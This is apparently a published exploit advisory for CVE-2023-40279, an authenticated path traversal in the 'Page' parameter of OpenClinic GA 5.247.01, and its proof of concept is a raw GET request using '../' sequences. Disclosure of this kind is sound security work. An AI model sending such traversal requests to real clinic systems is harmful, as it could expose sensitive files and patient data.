
Exploit Title: OpenClinic GA 5.247.01 - Path Traversal (Authenticated)
Date: 2023-08-14
Exploit Author: V. B.
Vendor Homepage: https://sourceforge.net/projects/open-clinic/
Software Link: https://sourceforge.net/projects/open-clinic/
Version: OpenClinic GA 5.247.01
Tested on: Windows 10, Windows 11
CVE: CVE-2023-40279
Details
An issue was discovered in OpenClinic GA version 5.247.01, where an attacker can perform a directory path traversal via the 'Page' parameter in a GET request to 'main.do'. This vulnerability allows for the retrieval and execution of files from arbitrary directories.
Proof of Concept (PoC)
Steps to Reproduce:
- Crafting the malicious GET request:
  - Utilize a web browser or a tool capable of sending custom HTTP requests, such as curl or Burp Suite.
  - Format the GET request as follows (in this example, ../../main.jsp is used to attempt directory traversal to access main.jsp):

    GET /openclinic/main.do?Page=../../main.jsp HTTP/1.1
    Host: 192.168.100.5:10088
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en-US;q=0.9,en;q=0.8
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
    Connection: close
    Cookie: JSESSIONID=[SESSION ID]
    Cache-Control: max-age=0

- Confirming the vulnerability:
  - Send the crafted GET request to the target server.
  - If the server responds with the content of the requested file (e.g., main.jsp) from outside the intended directory, it confirms the presence of a directory path traversal vulnerability.
  - This vulnerability can lead to sensitive information disclosure or more severe attacks.